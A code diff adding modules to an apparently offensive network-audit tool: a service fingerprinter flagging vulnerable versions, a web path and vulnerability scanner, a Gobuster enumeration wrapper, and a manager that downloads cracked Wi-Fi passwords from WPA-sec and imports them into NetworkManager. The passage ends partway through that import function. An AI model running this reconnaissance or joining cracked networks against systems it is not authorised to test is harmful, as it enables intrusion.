logger.info(f"Total number of successes: {len(telnet_bruteforce.telnet_connector.results)}")
exit(len(telnet_bruteforce.telnet_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

214
actions/thor_hammer.py Normal file
View File

@@ -0,0 +1,214 @@
# Service fingerprinting and version detection tool for vulnerability identification.
# Saves settings in `/home/bjorn/.settings_bjorn/thor_hammer_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -t, --target Target IP or hostname to scan (overrides saved value).
# -p, --ports Ports to scan (default: common ports, comma-separated).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/services).
# -d, --delay Delay between probes in seconds (default: 1).
# -v, --verbose Enable verbose output for detailed service information.
import os
import json
import socket
import argparse
import threading
from datetime import datetime
import logging
from concurrent.futures import ThreadPoolExecutor
import subprocess
b_class = "ThorHammer"
b_module = "thor_hammer"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/services"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "thor_hammer_settings.json")
DEFAULT_PORTS = [21, 22, 23, 25, 53, 80, 110, 115, 139, 143, 194, 443, 445, 1433, 3306, 3389, 5432, 5900, 8080]
# Service signature database
SERVICE_SIGNATURES = {
21: {
'name': 'FTP',
'vulnerabilities': {
'vsftpd 2.3.4': 'Backdoor command execution',
'ProFTPD 1.3.3c': 'Remote code execution'
}
},
22: {
'name': 'SSH',
'vulnerabilities': {
'OpenSSH 5.3': 'Username enumeration',
'OpenSSH 7.2p1': 'User enumeration timing attack'
}
},
# Add more signatures as needed
}
class ThorHammer:
def __init__(self, target, ports=None, output_dir=DEFAULT_OUTPUT_DIR, delay=1, verbose=False):
self.target = target
self.ports = ports or DEFAULT_PORTS
self.output_dir = output_dir
self.delay = delay
self.verbose = verbose
self.results = {
'target': target,
'timestamp': datetime.now().isoformat(),
'services': {}
}
self.lock = threading.Lock()
def probe_service(self, port):
"""Probe a specific port for service information."""
try:
# Initial connection test
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.delay)
result = sock.connect_ex((self.target, port))
if result == 0:
service_info = {
'port': port,
'state': 'open',
'service': None,
'version': None,
'vulnerabilities': []
}
# Get service banner
try:
banner = sock.recv(1024).decode('utf-8', errors='ignore').strip()
service_info['banner'] = banner
except:
service_info['banner'] = None
# Advanced service detection using nmap if available
try:
nmap_output = subprocess.check_output(
['nmap', '-sV', '-p', str(port), '-T4', self.target],
stderr=subprocess.DEVNULL
).decode()
# Parse nmap output
for line in nmap_output.split('\n'):
if str(port) in line and 'open' in line:
service_info['service'] = line.split()[2]
if len(line.split()) > 3:
service_info['version'] = ' '.join(line.split()[3:])
except:
pass
# Check for known vulnerabilities
if port in SERVICE_SIGNATURES:
sig = SERVICE_SIGNATURES[port]
service_info['service'] = service_info['service'] or sig['name']
if service_info['version']:
for vuln_version, vuln_desc in sig['vulnerabilities'].items():
if vuln_version.lower() in service_info['version'].lower():
service_info['vulnerabilities'].append({
'version': vuln_version,
'description': vuln_desc
})
with self.lock:
self.results['services'][port] = service_info
if self.verbose:
logging.info(f"Service detected on port {port}: {service_info['service']}")
sock.close()
except Exception as e:
logging.error(f"Error probing port {port}: {e}")
def save_results(self):
"""Save scan results to a JSON file."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
filename = os.path.join(self.output_dir, f"service_scan_{timestamp}.json")
with open(filename, 'w') as f:
json.dump(self.results, f, indent=4)
logging.info(f"Results saved to {filename}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
"""Execute the service scanning and fingerprinting process."""
logging.info(f"Starting service scan on {self.target}")
with ThreadPoolExecutor(max_workers=10) as executor:
executor.map(self.probe_service, self.ports)
self.save_results()
return self.results
def save_settings(target, ports, output_dir, delay, verbose):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"target": target,
"ports": ports,
"output_dir": output_dir,
"delay": delay,
"verbose": verbose
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Service fingerprinting and vulnerability detection tool")
parser.add_argument("-t", "--target", help="Target IP or hostname")
parser.add_argument("-p", "--ports", help="Ports to scan (comma-separated)")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
parser.add_argument("-d", "--delay", type=float, default=1, help="Delay between probes")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
args = parser.parse_args()
settings = load_settings()
target = args.target or settings.get("target")
ports = [int(p) for p in args.ports.split(',')] if args.ports else settings.get("ports", DEFAULT_PORTS)
output_dir = args.output or settings.get("output_dir")
delay = args.delay or settings.get("delay")
verbose = args.verbose or settings.get("verbose")
if not target:
logging.error("Target is required. Use -t or save it in settings")
return
save_settings(target, ports, output_dir, delay, verbose)
scanner = ThorHammer(
target=target,
ports=ports,
output_dir=output_dir,
delay=delay,
verbose=verbose
)
scanner.execute()
if __name__ == "__main__":
main()

313
actions/valkyrie_scout.py Normal file
View File

@@ -0,0 +1,313 @@
# Web application scanner for discovering hidden paths and vulnerabilities.
# Saves settings in `/home/bjorn/.settings_bjorn/valkyrie_scout_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -u, --url Target URL to scan (overrides saved value).
# -w, --wordlist Path to directory wordlist (default: built-in list).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/webscan).
# -t, --threads Number of concurrent threads (default: 10).
# -d, --delay Delay between requests in seconds (default: 0.1).
import os
import json
import requests
import argparse
from datetime import datetime
import logging
import threading
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urljoin
import re
from bs4 import BeautifulSoup
b_class = "ValkyrieScout"
b_module = "valkyrie_scout"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/webscan"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "valkyrie_scout_settings.json")
# Common web vulnerabilities to check
VULNERABILITY_PATTERNS = {
'sql_injection': [
"error in your SQL syntax",
"mysql_fetch_array",
"ORA-",
"PostgreSQL",
],
'xss': [
"<script>alert(1)</script>",
"javascript:alert(1)",
],
'lfi': [
"include(",
"require(",
"include_once(",
"require_once(",
]
}
class ValkyieScout:
def __init__(self, url, wordlist=None, output_dir=DEFAULT_OUTPUT_DIR, threads=10, delay=0.1):
self.base_url = url.rstrip('/')
self.wordlist = wordlist
self.output_dir = output_dir
self.threads = threads
self.delay = delay
self.discovered_paths = set()
self.vulnerabilities = []
self.forms = []
self.session = requests.Session()
self.session.headers = {
'User-Agent': 'Valkyrie Scout Web Scanner',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
}
self.lock = threading.Lock()
def load_wordlist(self):
"""Load directory wordlist."""
if self.wordlist and os.path.exists(self.wordlist):
with open(self.wordlist, 'r') as f:
return [line.strip() for line in f if line.strip()]
return [
'admin', 'wp-admin', 'administrator', 'login', 'wp-login.php',
'upload', 'uploads', 'backup', 'backups', 'config', 'configuration',
'dev', 'development', 'test', 'testing', 'staging', 'prod',
'api', 'v1', 'v2', 'beta', 'debug', 'console', 'phpmyadmin',
'mysql', 'database', 'db', 'wp-content', 'includes', 'tmp', 'temp'
]
def scan_path(self, path):
"""Scan a single path for existence and vulnerabilities."""
url = urljoin(self.base_url, path)
try:
response = self.session.get(url, allow_redirects=False)
if response.status_code in [200, 301, 302, 403]:
with self.lock:
self.discovered_paths.add({
'path': path,
'url': url,
'status_code': response.status_code,
'content_length': len(response.content),
'timestamp': datetime.now().isoformat()
})
# Scan for vulnerabilities
self.check_vulnerabilities(url, response)
# Extract and analyze forms
self.analyze_forms(url, response)
except Exception as e:
logging.error(f"Error scanning {url}: {e}")
def check_vulnerabilities(self, url, response):
"""Check for common vulnerabilities in the response."""
try:
content = response.text.lower()
for vuln_type, patterns in VULNERABILITY_PATTERNS.items():
for pattern in patterns:
if pattern.lower() in content:
with self.lock:
self.vulnerabilities.append({
'type': vuln_type,
'url': url,
'pattern': pattern,
'timestamp': datetime.now().isoformat()
})
# Additional checks
self.check_security_headers(url, response)
self.check_information_disclosure(url, response)
except Exception as e:
logging.error(f"Error checking vulnerabilities for {url}: {e}")
def analyze_forms(self, url, response):
"""Analyze HTML forms for potential vulnerabilities."""
try:
soup = BeautifulSoup(response.text, 'html.parser')
forms = soup.find_all('form')
for form in forms:
form_data = {
'url': url,
'method': form.get('method', 'get').lower(),
'action': urljoin(url, form.get('action', '')),
'inputs': [],
'timestamp': datetime.now().isoformat()
}
# Analyze form inputs
for input_field in form.find_all(['input', 'textarea']):
input_data = {
'type': input_field.get('type', 'text'),
'name': input_field.get('name', ''),
'id': input_field.get('id', ''),
'required': input_field.get('required') is not None
}
form_data['inputs'].append(input_data)
with self.lock:
self.forms.append(form_data)
except Exception as e:
logging.error(f"Error analyzing forms in {url}: {e}")
def check_security_headers(self, url, response):
"""Check for missing or misconfigured security headers."""
security_headers = {
'X-Frame-Options': 'Missing X-Frame-Options header',
'X-XSS-Protection': 'Missing X-XSS-Protection header',
'X-Content-Type-Options': 'Missing X-Content-Type-Options header',
'Strict-Transport-Security': 'Missing HSTS header',
'Content-Security-Policy': 'Missing Content-Security-Policy'
}
for header, message in security_headers.items():
if header not in response.headers:
with self.lock:
self.vulnerabilities.append({
'type': 'missing_security_header',
'url': url,
'detail': message,
'timestamp': datetime.now().isoformat()
})
def check_information_disclosure(self, url, response):
"""Check for information disclosure in response."""
patterns = {
'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
'internal_ip': r'\b(?:192\.168|10\.|172\.(?:1[6-9]|2[0-9]|3[01]))\.\d{1,3}\.\d{1,3}\b',
'debug_info': r'(?:stack trace|debug|error|exception)',
'version_info': r'(?:version|powered by|built with)'
}
content = response.text.lower()
for info_type, pattern in patterns.items():
matches = re.findall(pattern, content, re.IGNORECASE)
if matches:
with self.lock:
self.vulnerabilities.append({
'type': 'information_disclosure',
'url': url,
'info_type': info_type,
'findings': matches,
'timestamp': datetime.now().isoformat()
})
def save_results(self):
"""Save scan results to JSON files."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
# Save discovered paths
if self.discovered_paths:
paths_file = os.path.join(self.output_dir, f"paths_{timestamp}.json")
with open(paths_file, 'w') as f:
json.dump(list(self.discovered_paths), f, indent=4)
# Save vulnerabilities
if self.vulnerabilities:
vulns_file = os.path.join(self.output_dir, f"vulnerabilities_{timestamp}.json")
with open(vulns_file, 'w') as f:
json.dump(self.vulnerabilities, f, indent=4)
# Save form analysis
if self.forms:
forms_file = os.path.join(self.output_dir, f"forms_{timestamp}.json")
with open(forms_file, 'w') as f:
json.dump(self.forms, f, indent=4)
logging.info(f"Results saved to {self.output_dir}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
"""Execute the web application scan."""
try:
logging.info(f"Starting web scan on {self.base_url}")
paths = self.load_wordlist()
with ThreadPoolExecutor(max_workers=self.threads) as executor:
executor.map(self.scan_path, paths)
self.save_results()
except Exception as e:
logging.error(f"Scan error: {e}")
finally:
self.session.close()
def save_settings(url, wordlist, output_dir, threads, delay):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"url": url,
"wordlist": wordlist,
"output_dir": output_dir,
"threads": threads,
"delay": delay
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Web application vulnerability scanner")
parser.add_argument("-u", "--url", help="Target URL to scan")
parser.add_argument("-w", "--wordlist", help="Path to directory wordlist")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads")
parser.add_argument("-d", "--delay", type=float, default=0.1, help="Delay between requests")
args = parser.parse_args()
settings = load_settings()
url = args.url or settings.get("url")
wordlist = args.wordlist or settings.get("wordlist")
output_dir = args.output or settings.get("output_dir")
threads = args.threads or settings.get("threads")
delay = args.delay or settings.get("delay")
if not url:
logging.error("URL is required. Use -u or save it in settings")
return
save_settings(url, wordlist, output_dir, threads, delay)
scanner = ValkyieScout(
url=url,
wordlist=wordlist,
output_dir=output_dir,
threads=threads,
delay=delay
)
scanner.execute()
if __name__ == "__main__":
main()

364
actions/web_enum.py Normal file
View File

@@ -0,0 +1,364 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`.
- Writes each finding into the `webenum` table
- ON CONFLICT(mac_address, ip, port, directory) DO UPDATE
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit)
- No filesystem output: parse Gobuster stdout directly
- Filtrage dynamique des statuts HTTP via shared_data.web_status_codes
"""
import re
import socket
import subprocess
import threading
import logging
from typing import List, Dict, Tuple, Optional, Set
from shared import SharedData
from logger import Logger
# -------------------- Logger & module meta --------------------
logger = Logger(name="web_enum.py", level=logging.DEBUG)
b_class = "WebEnumeration"
b_module = "web_enum"
b_status = "WebEnumeration"
b_port = 80
b_service = '["http","https"]'
b_trigger = 'on_any:["on_web_service","on_new_port:80","on_new_port:443","on_new_port:8080","on_new_port:8443","on_new_port:9443","on_new_port:8000","on_new_port:8888","on_new_port:81","on_new_port:5000","on_new_port:5001","on_new_port:7080","on_new_port:9080"]'
b_parent = None
b_priority = 9
b_cooldown = 1800
b_rate_limit = '3/86400'
b_enabled = 1
# -------------------- Defaults & parsing --------------------
# Valeur de secours si l'UI n'a pas encore initialisé shared_data.web_status_codes
# (par défaut: 2xx utiles, 3xx, 401/403/405 et tous les 5xx; 429 non inclus)
DEFAULT_WEB_STATUS_CODES = [
200, 201, 202, 203, 204, 206,
301, 302, 303, 307, 308,
401, 403, 405,
"5xx",
]
ANSI_RE = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
CTL_RE = re.compile(r"[\x00-\x1F\x7F]") # non-printables
# Gobuster "dir" line examples handled:
# /admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/]
# /images (Status: 200) [Size: 12345]
GOBUSTER_LINE = re.compile(
r"""^(?P<path>\S+)\s*
\(Status:\s*(?P<status>\d{3})\)\s*
(?:\[Size:\s*(?P<size>\d+)\])?
(?:\s*\[\-\-\>\s*(?P<redir>[^\]]+)\])?
""",
re.VERBOSE
)
def _normalize_status_policy(policy) -> Set[int]:
"""
Transforme une politique "UI" en set d'entiers HTTP.
policy peut contenir:
- int (ex: 200, 403)
- "xXX" (ex: "2xx", "5xx")
- "a-b" (ex: "500-504")
"""
codes: Set[int] = set()
if not policy:
policy = DEFAULT_WEB_STATUS_CODES
for item in policy:
try:
if isinstance(item, int):
if 100 <= item <= 599:
codes.add(item)
elif isinstance(item, str):
s = item.strip().lower()
if s.endswith("xx") and len(s) == 3 and s[0].isdigit():
base = int(s[0]) * 100
codes.update(range(base, base + 100))
elif "-" in s:
a, b = s.split("-", 1)
a, b = int(a), int(b)
a, b = max(100, a), min(599, b)
if a <= b:
codes.update(range(a, b + 1))
else:
v = int(s)
if 100 <= v <= 599:
codes.add(v)
except Exception:
logger.warning(f"Ignoring invalid status code token: {item!r}")
return codes
class WebEnumeration:
"""
Orchestrates Gobuster web dir enum and writes normalized results into DB.
In-memory only: no CSV, no temp files.
"""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.gobuster_path = "/usr/bin/gobuster" # verify with `which gobuster`
self.wordlist = self.shared_data.common_wordlist
self.lock = threading.Lock()
# ---- Sanity checks
import os
if not os.path.exists(self.gobuster_path):
raise FileNotFoundError(f"Gobuster not found at {self.gobuster_path}")
if not os.path.exists(self.wordlist):
raise FileNotFoundError(f"Wordlist not found: {self.wordlist}")
# Politique venant de lUI : créer si absente
if not hasattr(self.shared_data, "web_status_codes") or not self.shared_data.web_status_codes:
self.shared_data.web_status_codes = DEFAULT_WEB_STATUS_CODES.copy()
logger.info(
f"WebEnumeration initialized (stdout mode, no files). "
f"Using status policy: {self.shared_data.web_status_codes}"
)
# -------------------- Utilities --------------------
def _scheme_for_port(self, port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _reverse_dns(self, ip: str) -> Optional[str]:
try:
name, _, _ = socket.gethostbyaddr(ip)
return name
except Exception:
return None
def _extract_identity(self, row: Dict) -> Tuple[str, Optional[str]]:
"""Return (mac_address, hostname) from a row with tolerant keys."""
mac = row.get("mac_address") or row.get("mac") or row.get("MAC") or ""
hostname = row.get("hostname") or row.get("Hostname") or None
return str(mac), (str(hostname) if hostname else None)
# -------------------- Filter helper --------------------
def _allowed_status_set(self) -> Set[int]:
"""Recalcule à chaque run pour refléter une mise à jour UI en live."""
try:
return _normalize_status_policy(getattr(self.shared_data, "web_status_codes", None))
except Exception as e:
logger.error(f"Failed to load shared_data.web_status_codes: {e}")
return _normalize_status_policy(DEFAULT_WEB_STATUS_CODES)
# -------------------- DB Writer --------------------
def _db_add_result(self,
mac_address: str,
ip: str,
hostname: Optional[str],
port: int,
directory: str,
status: int,
size: int = 0,
response_time: int = 0,
content_type: Optional[str] = None,
tool: str = "gobuster") -> None:
"""Upsert a single record into `webenum`."""
try:
self.shared_data.db.execute("""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
tool = COALESCE(excluded.tool, webenum.tool),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""", (mac_address, ip, hostname, int(port), directory, int(status),
int(size or 0), int(response_time or 0), content_type, tool))
logger.debug(f"DB upsert: {ip}:{port}{directory} -> {status} (size={size})")
except Exception as e:
logger.error(f"DB insert error for {ip}:{port}{directory}: {e}")
# -------------------- Gobuster runner (stdout) --------------------
def _run_gobuster_stdout(self, url: str) -> Optional[str]:
base_cmd = [
self.gobuster_path, "dir",
"-u", url,
"-w", self.wordlist,
"-t", "10",
"--quiet",
"--no-color",
# Si supporté par ta version gobuster, tu peux réduire le bruit dès la source :
# "-b", "404,429",
]
def run(cmd):
return subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
# Try with -z first
cmd = base_cmd + ["-z"]
logger.info(f"Running Gobuster on {url}...")
try:
res = run(cmd)
if res.returncode == 0:
logger.success(f"Gobuster OK on {url}")
return res.stdout or ""
# Fallback if -z is unknown
if "unknown flag" in (res.stderr or "").lower() or "invalid" in (res.stderr or "").lower():
logger.info("Gobuster doesn't support -z, retrying without it.")
res2 = run(base_cmd)
if res2.returncode == 0:
logger.success(f"Gobuster OK on {url} (no -z)")
return res2.stdout or ""
logger.info(f"Gobuster failed on {url}: {res2.stderr.strip()}")
return None
logger.info(f"Gobuster failed on {url}: {res.stderr.strip()}")
return None
except Exception as e:
logger.error(f"Gobuster exception on {url}: {e}")
return None
def _parse_gobuster_text(self, text: str) -> List[Dict]:
"""
Parse gobuster stdout lines into entries:
{ 'path': '/admin', 'status': 301, 'size': 310, 'redirect': 'http://...'|None }
"""
entries: List[Dict] = []
if not text:
return entries
for raw in text.splitlines():
# 1) strip ANSI/control BEFORE regex
line = ANSI_RE.sub("", raw)
line = CTL_RE.sub("", line)
line = line.strip()
if not line:
continue
m = GOBUSTER_LINE.match(line)
if not m:
logger.debug(f"Unparsed line: {line}")
continue
# 2) extract all fields NOW
path = m.group("path") or ""
status = int(m.group("status"))
size = int(m.group("size") or 0)
redir = m.group("redir")
# 3) normalize path
if not path.startswith("/"):
path = "/" + path
path = "/" + path.strip("/")
entries.append({
"path": path,
"status": status,
"size": size,
"redirect": redir.strip() if redir else None
})
logger.info(f"Parsed {len(entries)} entries from gobuster stdout")
return entries
# -------------------- Public API --------------------
def execute(self, ip: str, port: int, row: Dict, status_key: str) -> str:
"""
Run gobuster on (ip,port), parse stdout, upsert each finding into DB.
Returns: 'success' | 'failed' | 'interrupted'
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Interrupted before start (orchestrator flag).")
return "interrupted"
scheme = self._scheme_for_port(port)
base_url = f"{scheme}://{ip}:{port}"
logger.info(f"Enumerating {base_url} ...")
self.shared_data.bjornorch_status = "WebEnumeration"
if self.shared_data.orchestrator_should_exit:
logger.info("Interrupted before gobuster run.")
return "interrupted"
stdout_text = self._run_gobuster_stdout(base_url)
if stdout_text is None:
return "failed"
if self.shared_data.orchestrator_should_exit:
logger.info("Interrupted after gobuster run (stdout captured).")
return "interrupted"
entries = self._parse_gobuster_text(stdout_text)
if not entries:
logger.warning(f"No entries for {base_url}.")
return "success" # scan ran fine but no findings
# ---- Filtrage dynamique basé sur shared_data.web_status_codes
allowed = self._allowed_status_set()
pre = len(entries)
entries = [e for e in entries if e["status"] in allowed]
post = len(entries)
if post < pre:
preview = sorted(list(allowed))[:10]
logger.info(
f"Filtered out {pre - post} entries not in policy "
f"{preview}{'...' if len(allowed) > 10 else ''}."
)
mac_address, hostname = self._extract_identity(row)
if not hostname:
hostname = self._reverse_dns(ip)
for e in entries:
self._db_add_result(
mac_address=mac_address,
ip=ip,
hostname=hostname,
port=port,
directory=e["path"],
status=e["status"],
size=e.get("size", 0),
response_time=0, # gobuster doesn't expose timing here
content_type=None, # unknown here; a later HEAD/GET probe can fill it
tool="gobuster"
)
return "success"
except Exception as e:
logger.error(f"Execute error on {ip}:{port}: {e}")
return "failed"
# -------------------- CLI mode (debug/manual) --------------------
if __name__ == "__main__":
shared_data = SharedData()
try:
web_enum = WebEnumeration(shared_data)
logger.info("Starting web directory enumeration...")
rows = shared_data.read_data()
for row in rows:
ip = row.get("IPs") or row.get("ip")
if not ip:
continue
port = row.get("port") or 80
logger.info(f"Execute WebEnumeration on {ip}:{port} ...")
status = web_enum.execute(ip, int(port), row, "enum_web_directories")
if status == "success":
logger.success(f"Enumeration successful for {ip}:{port}.")
elif status == "interrupted":
logger.warning(f"Enumeration interrupted for {ip}:{port}.")
break
else:
logger.failed(f"Enumeration failed for {ip}:{port}.")
logger.info("Web directory enumeration completed.")
except Exception as e:
logger.error(f"General execution error: {e}")

317
actions/wpasec_potfiles.py Normal file
View File

@@ -0,0 +1,317 @@
# wpasec_potfiles.py
# WPAsec Potfile Manager - Download, clean, import, or erase WiFi credentials
import os
import json
import glob
import argparse
import requests
import subprocess
from datetime import datetime
import logging
# ── METADATA / UI FOR NEO LAUNCHER ────────────────────────────────────────────
b_class = "WPAsecPotfileManager"
b_module = "wpasec_potfiles"
b_enabled = 1
b_action = "normal" # normal | aggressive | stealth
b_category = "wifi"
b_name = "WPAsec Potfile Manager"
b_description = (
"Download, clean, import, or erase Wi-Fi networks from WPAsec potfiles. "
"Options: download (default if API key is set), clean, import, erase."
)
b_author = "Infinition"
b_version = "1.0.0"
b_icon = f"/actions_icons/{b_class}.png"
b_docs_url = "https://wpa-sec.stanev.org/?api"
b_args = {
"key": {
"type": "text",
"label": "API key (WPAsec)",
"placeholder": "wpa-sec api key",
"secret": True,
"help": "API key used to download the potfile. If empty, the saved key is reused."
},
"directory": {
"type": "text",
"label": "Potfiles directory",
"default": "/home/bjorn/Bjorn/data/input/potfiles",
"placeholder": "/path/to/potfiles",
"help": "Directory containing/receiving .pot / .potfile files."
},
"clean": {
"type": "checkbox",
"label": "Clean potfiles directory",
"default": False,
"help": "Delete all files in the potfiles directory."
},
"import_potfiles": {
"type": "checkbox",
"label": "Import potfiles into NetworkManager",
"default": False,
"help": "Add Wi-Fi networks found in potfiles via nmcli (avoiding duplicates)."
},
"erase": {
"type": "checkbox",
"label": "Erase Wi-Fi connections from potfiles",
"default": False,
"help": "Delete via nmcli the Wi-Fi networks listed in potfiles (avoiding duplicates)."
}
}
b_examples = [
{"directory": "/home/bjorn/Bjorn/data/input/potfiles"},
{"key": "YOUR_API_KEY_HERE", "directory": "/home/bjorn/Bjorn/data/input/potfiles"},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "clean": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "import_potfiles": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "erase": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "clean": True, "import_potfiles": True},
]
def compute_dynamic_b_args(base: dict) -> dict:
"""
Enrich dynamic UI arguments:
- Pre-fill the API key if previously saved.
- Show info about the number of potfiles in the chosen directory.
"""
d = dict(base or {})
try:
settings_path = os.path.join(
os.path.expanduser("~"), ".settings_bjorn", "wpasec_settings.json"
)
if os.path.exists(settings_path):
with open(settings_path, "r", encoding="utf-8") as f:
saved = json.load(f)
saved_key = (saved or {}).get("api_key")
if saved_key and not d.get("key", {}).get("default"):
d.setdefault("key", {}).setdefault("default", saved_key)
d["key"]["help"] = (d["key"].get("help") or "") + " (auto-detected)"
except Exception:
pass
try:
directory = d.get("directory", {}).get("default") or "/home/bjorn/Bjorn/data/input/potfiles"
exists = os.path.isdir(directory)
count = 0
if exists:
count = len(glob.glob(os.path.join(directory, "*.pot"))) + \
len(glob.glob(os.path.join(directory, "*.potfile")))
extra = f" | Found: {count} potfile(s)" if exists else " | (directory does not exist yet)"
d["directory"]["help"] = (d["directory"].get("help") or "") + extra
except Exception:
pass
return d
# ── CLASS IMPLEMENTATION ─────────────────────────────────────────────────────
class WPAsecPotfileManager:
DEFAULT_SAVE_DIR = "/home/bjorn/Bjorn/data/input/potfiles"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "wpasec_settings.json")
DOWNLOAD_URL = "https://wpa-sec.stanev.org/?api&dl=1"
def __init__(self, shared_data):
"""
Orchestrator always passes shared_data.
Even if unused here, we store it for compatibility.
"""
self.shared_data = shared_data
logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")
# --- Orchestrator entry point ---
def execute(self, ip=None, port=None, row=None, status_key=None):
"""
Entry point for orchestrator.
By default: download latest potfile if API key is available.
"""
self.shared_data.bjorn_orch_status = "WPAsecPotfileManager"
self.shared_data.comment_params = {"ip": ip, "port": port}
api_key = self.load_api_key()
if api_key:
logging.info("WPAsecPotfileManager: downloading latest potfile (orchestrator trigger).")
self.download_potfile(self.DEFAULT_SAVE_DIR, api_key)
return "success"
else:
logging.warning("WPAsecPotfileManager: no API key found, nothing done.")
return "failed"
# --- API Key Handling ---
def save_api_key(self, api_key: str):
"""Save the API key locally."""
try:
os.makedirs(self.DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {"api_key": api_key}
with open(self.SETTINGS_FILE, "w") as file:
json.dump(settings, file)
logging.info(f"API key saved to {self.SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save API key: {e}")
def load_api_key(self):
"""Load the API key from local storage."""
if os.path.exists(self.SETTINGS_FILE):
try:
with open(self.SETTINGS_FILE, "r") as file:
settings = json.load(file)
return settings.get("api_key")
except Exception as e:
logging.error(f"Failed to load API key: {e}")
return None
# --- Actions ---
def download_potfile(self, save_dir, api_key):
"""Download the potfile from WPAsec."""
try:
cookies = {"key": api_key}
logging.info(f"Downloading potfile from: {self.DOWNLOAD_URL}")
response = requests.get(self.DOWNLOAD_URL, cookies=cookies, stream=True)
response.raise_for_status()
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
filename = os.path.join(save_dir, f"potfile_{timestamp}.pot")
os.makedirs(save_dir, exist_ok=True)
with open(filename, "wb") as file:
for chunk in response.iter_content(chunk_size=8192):
file.write(chunk)
logging.info(f"Potfile saved to: {filename}")
except requests.exceptions.RequestException as e:
logging.error(f"Failed to download potfile: {e}")
except Exception as e:
logging.error(f"Unexpected error: {e}")
def clean_directory(self, directory):
"""Delete all potfiles in the given directory."""
try:
if os.path.exists(directory):
logging.info(f"Cleaning directory: {directory}")
for file in os.listdir(directory):
file_path = os.path.join(directory, file)
if os.path.isfile(file_path):
os.remove(file_path)
logging.info(f"Deleted: {file_path}")
else:
logging.info(f"Directory does not exist: {directory}")
except Exception as e:
logging.error(f"Failed to clean directory {directory}: {e}")
def import_potfiles(self, directory):
"""Import potfiles into NetworkManager using nmcli."""
try:
potfile_paths = glob.glob(os.path.join(directory, "*.pot")) + glob.glob(os.path.join(directory, "*.potfile"))
processed_ssids = set()
networks_added = []
DEFAULT_PRIORITY = 5
for path in potfile_paths:
